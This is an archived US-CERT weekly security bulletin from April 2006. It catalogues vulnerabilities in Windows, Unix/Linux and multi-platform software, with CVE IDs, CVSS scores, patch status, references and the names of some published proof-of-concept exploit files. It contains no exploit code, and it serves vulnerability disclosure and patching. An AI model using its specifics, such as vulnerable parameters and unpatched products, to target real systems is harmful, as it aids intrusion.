
Note: This page is part of the us-cert.gov archive. This document is part of the US-CERT website archive. These documents are no longer updated and may contain outdated information. Links may also no longer function. Please contact info@us-cert.gov if you have any questions about the US-CERT website archive.

TLP:WHITE

Bulletin (SB06-096)

Summary of Security Items from March 30 through April 5, 2006

Original release date: April 06, 2006

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

The US-CERT Cyber Security Bulletin provides a summary of new and updated vulnerabilities, exploits, trends, and malicious code that have recently been openly reported. Information in the Cyber Security Bulletin is a compilation of open source and US-CERT vulnerability information. As such, the Cyber Security Bulletin includes information published by sources outside of US-CERT and should not be considered the result of US-CERT analysis or as an official report of US-CERT. Although this information does reflect open source reports, it is not an official description and should be used for informational purposes only. The intention of the Cyber Security Bulletin is to serve as a comprehensive directory of pertinent vulnerability reports, providing brief summaries and additional sources for further investigation.

Vulnerabilities
Wireless Trends & Vulnerabilities
General Trends
Viruses/Trojans


Vulnerabilities

The tables below summarize vulnerabilities that have been reported by various open source organizations or presented in newsgroups and on web sites. Items in bold designate updates that have been made to past entries. Entries are grouped by the operating system on which the reported software operates, and vulnerabilities which affect both Windows and Unix/Linux operating systems are included in the Multiple Operating Systems table. Note that entries in each table are not necessarily vulnerabilities in that operating system, but vulnerabilities in software that operates on some version of that operating system.

Entries may contain additional US-CERT sponsored information, including Common Vulnerabilities and Exposures (CVE) numbers, National Vulnerability Database (NVD) links, Common Vulnerability Scoring System (CVSS) values, Open Vulnerability and Assessment Language (OVAL) definitions, or links to US-CERT Vulnerability Notes. Metrics, values, and information included in the Cyber Security Bulletin that have been provided by other US-CERT sponsored programs are prepared, managed, and contributed by those respective programs. CVSS values are managed and provided by the US-CERT/NIST National Vulnerability Database. Links are also provided to patches and workarounds that have been provided by the product's vendor.

The Risk levels are defined below:

High - Vulnerabilities will be labeled “High” severity if they have a CVSS base score of 7.0-10.0.

Medium - Vulnerabilities will be labeled “Medium” severity if they have a base CVSS score of 4.0-6.9.

Low - Vulnerabilities will be labeled “Low” severity if they have a CVSS base score of 0.0-3.9.

Note that scores provided prior to 11/9/2005 are approximated from only partially available CVSS metric data. Such scores are marked as "Approximated" within NVD. In particular, the following CVSS metrics are only partially available for these vulnerabilities and NVD assumes certain values based on an approximation algorithm: AccessComplexity, Authentication, ConfImpact of 'partial', IntegImpact of 'partial', AvailImpact of 'partial', and the impact biases.

Windows Operating Systems Only

Vendor & Software Name | Description | Common Name | CVSS | Resources

AN HTTPD 1.42n

A vulnerability has been reported in AN HTTPD that could let remote malicious users disclose information (script source).

Contact the vendor for AN HTTPD 1.42p.

Currently we are not aware of any exploits for this vulnerability.

AN HTTPD Information Disclosure

CVE-2006-1598

3.3

Secunia, Advisory: SA19326, April 3, 2006

Eset Software

NOD32 Antivirus 2.5

A vulnerability has been reported in NOD32 Antivirus that could let local malicious users obtain arbitrary file creation rights.

Upgrade to NOD32 Antivirus 2.51.26 via tool's online update capabilities.

There is no exploit code required.

NOD32 Antivirus Arbitrary File Creation

CVE-2006-0951

Not Available

Secunia, Advisory: SA19054, April 5, 2006

EzASPSite 2.0 RC3

An input validation vulnerability has been reported in EzASPSite that could let remote malicious users perform SQL injection.

No workaround or patch available at time of publishing.

There is no exploit code required.

EzASPSite Default.ASP SQL Injection Vulnerability

CVE-2006-1541

3.3

Secunia, Advisory: SA19441, March 30, 2006

HP

Color LaserJet Toolbox 2500 and 4600 for Windows

An input validation vulnerability has been reported in Color LaserJet Toolbox that could let remote malicious users disclose information.

HP Solution

A Proof of Concept exploit has been published.

HP Color LaserJet Toolbox Information Disclosure

CVE-2006-1654

Not Available

Security Focus, ID: 17367, April 4, 2006

McAfee

VirusScan 10.0.21, SecurityCenter Agent 6.0.0.16

A buffer overflow vulnerability has been reported in VirusScan, DUNZIP32.dll, that could let remote malicious users obtain unauthorized access.

Upgrade to the newest version of DUNZIP32.dll via the tool's online update capabilities.

There is no exploit code required.

McAfee VirusScan Unauthorized Access

CVE-2004-1094

10

Secunia, Advisory: SA19460, March 30, 2006

McAfee

WebShield SMTP 4.5 MR1a

A vulnerability has been reported in WebShield that could let remote malicious users execute arbitrary code.

McAfee WebShield 4.5 MR2

There is no exploit code required.

McAfee WebShield Arbitrary Code Execution

CVE-2006-0559

10

Security Tracker, Alert ID: 1015861, April 4, 2006

Microsoft

Office XP, XP SP1, XP SP2, XP SP3

A vulnerability has been reported in Office XP (array index) that could let remote malicious users cause a Denial of Service.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, excel_03262006.rar, has been published.

Microsoft Office XP Denial of Service

CVE-2006-1540

1.4

Security Focus, ID: 17252, March 27, 2006

Microsoft

Windows Help File Viewer

A heap overflow vulnerability has been reported in Windows Help File Viewer that could let remote malicious users execute arbitrary code.

No workaround or patch available at time of publishing.

Currently we are not aware of any exploits for this vulnerability.

Microsoft Windows Help File Viewer Arbitrary Code Execution

CVE-2006-1591

5.6

Security Focus, ID: 17325, March 31, 2006

RealPlayer 8, 10, 10.0.6, 10.5, RealOne Player, and RealPlayer Enterprise

A buffer overflow vulnerability has been reported in RealPlayer, Mimio Broadcast file processing, that could let remote malicious users execute arbitrary code.

RealPlayer

There is no exploit code required.

RealPlayer Arbitrary Code Execution

CVE-2006-1370

7

Security Tracker, Alert ID: 1015810, March 24, 2006

US-CERT VU#451556

SiteSearch Indexer 3.5

An input validation vulnerability has been reported in SiteSearch Indexer, searchresults.asp, that could let remote malicious users conduct Cross-Site Scripting.

No workaround or patch available at time of publishing.

A Proof of Concept exploit has been published.

SiteSearch Indexer Cross-Site Scripting

CVE-2006-1567

2.3

Security Focus, ID: 17332, March 31, 2006

SMART Technologies

SynchronEyes 6.0

Multiple vulnerabilities have been reported in SynchronEyes that could let remote malicious users cause a Denial of Service.

No workaround or patch available at time of publishing.

There is no exploit code required.

SynchronEyes Denial of Service

CVE-2006-1647
CVE-2006-1648

Not Available

Security Focus, ID: 17373, April 4, 2006

Total Commander prior to 6.54

A buffer overflow vulnerability has been reported in Total Commander that could let remote malicious users execute arbitrary code.

Total Commander 6.54

There is no exploit code required.

Total Commander Arbitrary Code Execution

Not Available

Security Tracker, Alert ID: 1015852, March 31, 2006

UltraVNC 1.0.1

Multiple buffer overflow vulnerabilities have been reported in UltraVNC that could let remote malicious users execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, uvncbof.zip, has been published.

UltraVNC Arbitrary Code Execution

CVE-2006-1652

Not Available

Security Focus, ID: 17378, April 4, 2006

UNIX / Linux Operating Systems Only

Vendor & Software Name | Description | Common Name | CVSS | Resources

Apple

Mac OS X Server 10.4.5, OS X 10.4.5

A vulnerability has been reported on Intel-based Macintosh computers due to an unspecified error, which could let a remote malicious user bypass the firmware password.

Updates available

Currently we are not aware of any exploits for this vulnerability.

Mac OS X Firmware Password Bypass

CVE-2006-0401

4.9

Apple Security Advisory, APPLE-SA-2006-04-03, April 3, 2006

Apple

Safari RSS 2.3 pre-release, 2.0-2.0.2, 1.3, 1.2-1.2.3, 1.0, 1.1, Beta 2, Mac OS X Server 10.4-10.4.5, Mac OS X 10.4-10.4.5

A remote Denial of Service vulnerability has been reported in 'ImageIO' due to a failure to process malicious image files.

No workaround or patch available at time of publishing.

There is no exploit code required.

Apple Mac OS X Remote Denial of Service

CVE-2006-1552

2.3

Security Focus, Bugtraq ID: 17321, March 30, 2006

BusyBox

BusyBox Linux Utilities

A vulnerability has been reported in 'passwd' due to a design flaw that results in password hashes being created in an insecure manner, which could let a malicious user bypass security restrictions.

No workaround or patch available at time of publishing.

Precomputed password hashes can be used to exploit this vulnerability.

BusyBox Insecure Password Hash

CVE-2006-1058

1.6

Secunia Advisory: SA19477, March 31, 2006

Crafty Syntax Image Gallery

Crafty Syntax Image Gallery 3.1g.

Several vulnerabilities have been reported: an SQL injection vulnerability was reported in 'slides.php' due to insufficient sanitization of the 'limitquery_s' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported due to insufficient verification of images during the upload process, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, an exploit script, crappy_syntax.pl, has been published.

Crafty Syntax Image Gallery SQL Injection & Image Verification

Not Available

Secunia Advisory: SA19478, April 5, 2006

FreeRADIUS

FreeRADIUS 1.0-1.0.5

A vulnerability has been reported in the EAP-MSCHAPv2 state machine due to an error, which could let a malicious user bypass authentication and cause a Denial of Service.

Updates available

SuSE

RedHat

Gentoo

Currently we are not aware of any exploits for this vulnerability.

FreeRADIUS EAP-MSCHAPv2 Authentication Bypass

CVE-2006-1354

8

Security Focus, Bugtraq ID: 17171, March 21, 2006

SUSE Security Announcement, SUSE-SA:2006:019, March 28, 2006

RedHat Security Advisory, RHSA-2006:0271-11, April 4, 2006

Gentoo Linux Security Advisory, GLSA 200604-03, April 4, 2006

GNU

Mailman 2.1-2.1.5, 2.0-2.0.14

A remote Denial of Service vulnerability has been reported in 'Scrubber.py' due to a failure to handle exception conditions when Python fails to process an email file attachment that contains utf8 characters in its filename.

Mandriva

SuSE

Ubuntu

Debian

RedHat

Trustix

SGI

There is no exploit code required.

GNU Mailman Attachment Scrubber UTF8 Filename Remote Denial of Service

CVE-2005-3573

Secunia Advisory: SA17511, November 14, 2005

Mandriva Linux Security Advisory, MDKSA-2005:222, December 2, 2005

SUSE Security Summary Report, SUSE-SR:2006:001, January 13, 2006

Ubuntu Security Notice, USN-242-1 January 16, 2006

Debian Security Advisory, DSA-955-1, January 25, 2006

RedHat Security Advisory, RHSA-2006:0204-10, March 7, 2006

Trustix Secure Linux Security Advisory #2006-0012, March 10, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

GNU

GNU Privacy Guard prior to 1.4.2.2.

A vulnerability has been reported caused due to an error in the detection of unsigned data, which could let a remote malicious user inject arbitrary data and bypass verification.

Updates available

Debian

Gentoo

Fedora

SuSE

Slackware

RedHat

Ubuntu

Trustix

SGI

There is no exploit code required.

GnuPG Unsigned Data Injection Detection

CVE-2006-0049

GNU Security Advisory, March 9, 2006

Debian Security Advisory, DSA 993-1, March 10, 2006

Gentoo Linux Security Advisory, GLSA 200603-08, March 10, 2006

SUSE Security Announcement, SUSE-SA:2006:014, March 10, 2006

Slackware Security Advisory, SSA:2006-072-02, March 13, 2006

RedHat Security Advisory, RHSA-2006:0266-8, March 15, 2006

Ubuntu Security Notice, USN-264-1, March 13, 2006

Trustix Secure Linux Security Advisory #2006-0014, March 20, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

GnuPG

GnuPG / gpg prior to 1.4.2.1

A vulnerability has been reported because 'gpgv' exits with a return code of 0 even if the detached signature file did not carry any signature (if 'gpgv' or 'gpg --verify' is used), which could let a remote malicious user bypass security restrictions.

Patches available

Fedora

Debian

Mandriva

Ubuntu

Gentoo

SuSE

SuSE

SuSE

Slackware

RedHat

SGI

There is no exploit code required; however, a Proof of Concept exploit has been published.

GnuPG Detached Signature Verification Bypass

CVE-2006-0455

4.9

GnuPG Advisory, February 15, 2006

Fedora Update Notification, FEDORA-2006-116, February 17, 2006

Debian Security Advisory, DSA-978-1, February 17, 2006

Mandriva Security Advisory, MDKSA-2006:043, February 17, 2006

Ubuntu Security Notice, USN-252-1, February 17, 2006

Gentoo Linux Security Advisory, GLSA 200602-10, February 18, 2006

SuSE Security Announcement, SUSE-SA:2006:009, February 20, 2006

SUSE Security Announcement, SUSE-SA:2006:013, March 1, 2006

SUSE Security Summary Report, SUSE-SR:2006:005, March 3, 2006

Slackware Security Advisory, SSA:2006-072-02, March 13, 2006

RedHat Security Advisory, RHSA-2006:0266-8, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Hitachi

XFIT/S/ZGN 0, XFIT/S XFIT/S/JCA 0, XFIT/S XFIT/S, ZENGIN 0, XFIT/S XFIT/S 0

A remote Denial of Service vulnerability has been reported due to an unspecified error when the service receives data unexpectedly.

Update information

Currently we are not aware of any exploits for this vulnerability.

Hitachi XFIT/S Remote Denial of Service

CVE-2006-1609

2.3

Hitachi Security Advisory, HS06-004, March 31, 2006

Horde Project

Horde Application Framework 3.0.9 & prior

A vulnerability has been reported in 'services/go.php' due to insufficient verification of the 'url' parameter before using in a 'readfile()' call, which could let a remote malicious user obtain sensitive information.

Updates available

Gentoo

Currently we are not aware of any exploits for this vulnerability.

Horde Information Disclosure

CVE-2006-1260

2.3

Secunia Advisory: SA19246, March 15, 2006

Gentoo Linux Security Advisory, GLSA 200604-02, April 4, 2006

Kaffeine

Kaffeine Media Player 0.4.2-0.7.1

A buffer overflow vulnerability has been reported in the 'http_peek()' function when creating HTTP request headers for retrieving remote playlists, which could let a remote malicious user execute arbitrary code.

Patches available

Debian

Mandriva

Gentoo

Currently we are not aware of any exploits for this vulnerability.

Kaffeine Buffer Overflow

CVE-2006-0051

5.6

KDE Security Advisory, April 4, 2006

Debian Security Advisory, DSA-1023-1, April 5, 2006

Mandriva Linux Security Advisory MDKSA-2006:065, April 5, 2006

Gentoo Linux Security Advisory, GLSA 200604-04, April 5, 2006

MediaWiki

MediaWiki 1.5.7

An HTML injection vulnerability has been reported in the Encoded Page Link due to insufficient sanitization of user-supplied input before using it in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

SuSE

Gentoo

Vulnerability can be exploited via a web client.

MediaWiki HTML Injection

CVE-2006-1498

2.3

Security Focus, Bugtraq ID: 17269, March 27, 2006

SUSE Security Summary Report, SUSE-SR:2006:007, March 31, 2006

Gentoo Linux Security Advisory, GLSA 200604-01, April 4, 2006

mpg123

mpg123 0.59r

A vulnerability has been reported when handling MP3 streams, which could let a remote malicious user corrupt memory or possibly execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept Denial of Service exploit script, mpg1DoS3.pl, has been published.

MPG123 Malformed MP3 File Memory Corruption

CVE-2006-1655

Not Available

Security Focus, Bugtraq ID: 17365, April 4, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14

A Denial of Service vulnerability has been reported in 'net/ipv6/udp.c' due to an infinite loop error in the 'udp_v6_get_port()' function.

Fedora

Upgrades available

Ubuntu

SUSE

RedHat

RedHat

RedHat

SmoothWall

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPV6 Denial of Service

CVE-2005-2973

Secunia Advisory: SA17261, October 21, 2005

Fedora Update Notifications, FEDORA-2005-1007 & 1013, October 20, 2005

Security Focus, Bugtraq ID: 15156, October 31, 2005

Ubuntu Security Notice, USN-219-1, November 22, 2005

SUSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

SmoothWall Advisory, March 15, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

RedHat Fedora Core4, Enterprise Linux WS 3, WS 2.1 IA64, WS 2.1, ES 3, ES 2.1 IA64, ES 2.1, AS 3, AS 2.1 IA64, AS 2.1, Advanced Workstation for the Itanium Processor 2.1 IA64, 2.1;
PHP PHP 5.1-5.1.3, 5.0-5.0.2, 4.4.0-4.4.2, 4.3-4.3.11, 4.2-4.2.3, 4.1.0-4.1.2, 4.0.0-4.0.7

A Cross-site scripting vulnerability has been reported in 'phpinfo()' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code.

A CVS fix is available.

Vulnerability may be exploited with a web client.

PHP 'PHPInfo' Cross-Site Scripting

Not Available

Security Focus, Bugtraq ID: 17362, April 4, 2006

Multiple Vendors

Squid Web Proxy Cache 2.5.STABLE3-STABLE10, STABLE1

A remote Denial of Service vulnerability has been reported when handling certain client NTLM authentication request sequences.

Upgrades available

Ubuntu

Debian

Mandriva

SCO

SUSE

RedHat

RHSA-2006:0045-8

SGI

Currently we are not aware of any exploits for this vulnerability.

Squid NTLM Authentication Remote Denial of Service

CVE-2005-2917

Secunia Advisory: SA16992, September 30, 2005

Ubuntu Security Notice, USN-192-1, September 30, 2005

Debian Security Advisory, DSA 828-1, September 30, 2005

Mandriva Linux Security Update Advisory, MDKSA-2005:181, October 11, 2005

SCO Security Advisory, SCOSA-2005.44, November 1, 2005

SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005

SUSE Security Summary Report, SUSE-SR:2005:027, November 18, 2005

RedHat Security Advisory, RHSA-2006:0052-7, March 7, 2006

RedHat Security Advisory, RHSA-2006:0045-8, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Multiple Vendors

Ubuntu Linux 5.10 powerpc, i386, amd64, 5.0 4 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
MandrakeSoft Linux Mandrake 10.2 x86_64, 10.2, Corporate Server 3.0 x86_64, 3.0;
GNU Mailman 2.1-2.1.5, 2.0-2.0.14, 1.0, 1.1; Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha

A remote Denial of Service vulnerability has been reported in the attachment-scrubber utility.

Update to version 2.1.6 or later.

Mandriva

Ubuntu

Debian

There is no exploit code required.

GNU Mailman Attachment Scrubber Remote Denial of Service

CVE-2006-0052

Security Focus, Bugtraq ID: 17311, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:061, March 29, 2006

Ubuntu Security Notice, USN-267-1, April 03, 2006

Debian Security Advisory, DSA-1027-1, April 6, 2006

Multiple Vendors

Linux kernel 2.6 prior to 2.6.12.1

A vulnerability has been reported in the 'restore_sigcontext()' function due to a failure to restrict access to the 'ar.rsc' register, which could let a malicious user cause a Denial of Service or obtain elevated privileges.

Linux Kernel

SUSE

RedHat:

RedHat

Debian

Conectiva

Debian

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel 64 Bit 'AR-RSC' Register Access

CVE-2005-1761

Security Tracker Alert ID: 1014275, June 23, 2005

SUSE Security Announcement, SUSE-SA:2005:044, August 4, 2005

RedHat Security Advisory, RHSA-2005:663-19, September 28, 2005

RedHat Security Advisory, RHSA-2005:514-46, October 5, 2005

Debian Security Advisories, DSA 921-1 & 922-1, December 14, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.12.1

A vulnerability has been reported due to insufficient authorization before accessing a privileged function, which could let a malicious user bypass IPSEC policies.

Ubuntu

This issue has been addressed in Linux kernel 2.6.13-rc7.

SUSE

RedHat

RedHat

Mandriva

Conectiva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPSec Policies Authorization Bypass

CVE-2005-2555

Ubuntu Security Notice, USN-169-1, August 19, 2005

Security Focus, Bugtraq ID 14609, August 19, 2005

Security Focus, Bugtraq ID 14609, August 25, 2005

SUSE Security Announcement, SUSE-SA:2005:050, September 1, 2005

RedHat Security Advisory, RHSA-2005:663-19, September 28, 2005

RedHat Security Advisory, RHSA-2005:514-46, October 5, 2005

Mandriva Linux Security Advisory, MDKSA-2005:218, November 30, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14

A Denial of Service vulnerability has been reported in 'sysctl.c' due to an error when handling the un-registration of interfaces in '/proc/sys/net/ipv4/conf/'.

Upgrades available

Ubuntu

RedHat

RedHat

RedHat

RedHat

DSA-1017

DSA-1018

DSA 1018-2

There is no exploit code required.

Linux Kernel 'Sysctl' Denial of Service

CVE-2005-2709

Secunia Advisory: SA17504, November 9, 2005

Ubuntu Security Notice, USN-219-1, November 22, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14, 2.5.0-2.5.69, 2.4-2.4.32, 2.3, 2.3.x, 2.3.99, pre1-pre7, 2.2-2.2.27, 2.1, 2.1.x, 2.1.89, 2.0.28-2.0.39

A vulnerability has been reported due to the way console keyboard mapping is handled, which could let a malicious user modify the console keymap to include scripted macro commands.

Mandriva

Fedora

Conectiva

SmoothWall

DSA-1017

DSA-1018

DSA 1018-2

There is no exploit code required; however, a Proof of Concept exploit has been published.

Linux Kernel Console Keymap Arbitrary Command Injection

CVE-2005-3257

Security Focus, Bugtraq ID: 15122, October 17, 2005

Mandriva Linux Security Advisories, MDKSA-2005:218, 219 & 220, November 30, 2005

Fedora Update Notification, FEDORA-2005-1138, December 13, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

SmoothWall Advisory, March 15, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14; SuSE Linux Professional 10.0 OSS, Linux Personal 10.0 OSS;
RedHat Fedora Core4

A Denial of Service vulnerability has been reported in 'ptrace.c' when 'CLONE_THREAD' is used due to a missing check of the thread's group ID when trying to determine whether the process is attempting to attach to itself.

Upgrades available

Fedora

SUSE

Mandriva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel PTrace 'CLONE_THREAD' Denial of Service

CVE-2005-3783

Secunia Advisory: SA17761, November 29, 2005

Fedora Update Notification, FEDORA-2005-1104, November 28, 2005

SuSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

Mandriva Security Advisory, MDKSA-2006:018, January 20, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.15

A Denial of Service vulnerability has been reported in the 'time_out_leases()' function because 'printk()' can consume large amounts of kernel log space.

Patches available

Trustix

RedHat

RedHat

DSA-1017

DSA-1018

DSA 1018-2

An exploit script has been published.

Linux Kernel PrintK Local Denial of Service

CVE-2005-3857

Security Focus, Bugtraq ID: 15627, November 29, 2005

Trustix Secure Linux Security Advisory, TSLSA-2005-0070, December 9, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

RealOne Helix Player 1.x, RealOne Player v1, v2, RealPlayer 10.x, 8, RealPlayer Enterprise 1.x; Gentoo Linux; SuSE Novell Linux Desktop 9.0, Linux Professional 10.0 OSS, 9.3 x86_64, 9.3, 9.2 x86_64, 9.2, Linux Personal 10.0 OSS, 9.3 x86_64, 9.3, 9.2 x86_64, 9.2

Multiple vulnerabilities have been reported: a buffer overflow vulnerability was reported in the handling of the 'chunked' Transfer-Encoding method due to a boundary error, which could let a remote malicious user execute arbitrary code; a buffer overflow vulnerability was reported when processing SWF files due to a boundary error, which could let a remote malicious user execute arbitrary code; and a vulnerability was reported due to the incorrect use of the 'CreateProcess()' API when executing other programs, which could let a remote malicious user execute arbitrary code.

Updates available

Gentoo

SuSE

RedHat

A Proof of Concept exploit script, realplayer-swf-PoC.pl.txt, has been published.

RealNetworks Products Multiple Buffer Overflow

CVE-2005-2922
CVE-2005-2936
CVE-2006-0323

7 (CVE-2005-2936)

7 (CVE-2006-0323)

Secunia Advisory: SA19358, March 27, 2006

Gentoo Linux Security Advisory, GLSA 200603-24, March 26, 2006

SUSE Security Announcement, SUSE-SA:2006:018, March 23, 2006

RedHat Security Advisory, RHSA-2006:0257-9, March 22, 2006

US-CERT VU#231028

US-CERT VU#172489

Packetstorm, April 1, 2006

Multiple Vendors

SuSE Linux Professional 10.0 OSS, 10.0, Personal 10.0 OSS;
Linux kernel 2.6-2.6.13, Linux kernel 2.4-2.4.32

A Denial of Service vulnerability has been reported in FlowLabel.

Upgrades available

SUSE

RedHat

RedHat

Mandriva

RedHat

RedHat

Mandriva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPv6 FlowLabel Denial of Service

CVE-2005-3806

Security Focus, Bugtraq ID: 15729, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

Mandriva Security Advisory, MDKSA-2006:018, January 20, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

Mandriva Security Advisory, MDKSA-2006:044, February 21, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Ubuntu Linux 5.0 4 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
Linux kernel 2.6.10, rc2, 2.6.8, rc1

A remote Denial of Service vulnerability has been reported in the kernel driver for compressed ISO file systems when attempting to mount a malicious compressed ISO image.

Ubuntu

SUSE

Mandriva

Conectiva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel ISO File System Remote Denial of Service

CVE-2005-2457

Ubuntu Security Notice, USN-169-1, August 19, 2005

SUSE Security Announcement, SUSE-SA:2005:050, September 1, 2005

Mandriva Linux Security Advisory, MDKSA-2005:218, November 30, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Ubuntu Linux 5.10 powerpc, i386, amd64, 5.0 4 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
MandrakeSoft Linux Mandrake 2006.0 x86_64, 2006.0, 10.2 x86_64, 10.2, 10.1 x86_64, 10.1, Corporate Server 3.0 x86_64, 3.0;
GNU Mailman 2.1-2.1.5, 2.0-2.0.14

A remote Denial of Service vulnerability has been reported in the email date parsing functionality due to an error in the handling of dates.

Mandriva

Ubuntu

Debian

RedHat

Trustix

SGI

There is no exploit code required.

GNU Mailman Remote Denial of Service

CVE-2005-4153

Security Focus, Bugtraq ID: 16248, January 16, 2006

Ubuntu Security Notice, USN-242-1 January 16, 2006

Debian Security Advisory, DSA-955-1, January 25, 2006

RedHat Security Advisory, RHSA-2006:0204-10, March 7, 2006

Trustix Secure Linux Security Advisory #2006-0012, March 10, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Multiple Vendors

VServer util-vserver 0.30.210, 0.30.209, util-vserver 0; Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha

A vulnerability has been reported in the util-vserver package 'suexec,' which could let a remote malicious user obtain elevated privileges.

No workaround or patch available at time of publishing.

There is no exploit code required.

Util-VServer Elevated Privileges

CVE-2006-1656

Not Available

Security Focus, Bugtraq ID: 17361, April 4, 2006

Openwall

Openwall
crypt_blowfish 0.4.7 & prior

A vulnerability has been reported in the 'crypt_gensalt' functions for BSDI-style extended DES-based and FreeBSD-style MD5-based password hashes because they do not evenly and randomly distribute salts, which makes it easier for malicious users with a stolen copy of the password file to guess passwords due to the increased number of salt collisions.

Updates available

Currently we are not aware of any exploits for this vulnerability.

Openwall 'crypt_blowfish' Information Disclosure

CVE-2006-0591

Secunia Advisory: SA18772, February 8, 2006

Paul Vixie

Vixie Cron 4.1

A vulnerability has been reported due to insecure creation of temporary files when crontab is executed with the '-e' option, which could let a malicious user obtain sensitive information.

Fedora

RedHat

RHSA-2006:0117-7

SGI

There is no exploit code required; however, a Proof of Concept exploit script has been published.

Vixie Cron Crontab Information Disclosure

CVE-2005-1038

Security Focus, 13024, April 6, 2005

Fedora Update Notification, FEDORA-2005-320, April 15, 2005

Fedora Update Notifications, FEDORA-2005-550 & 551, July 12, 2005

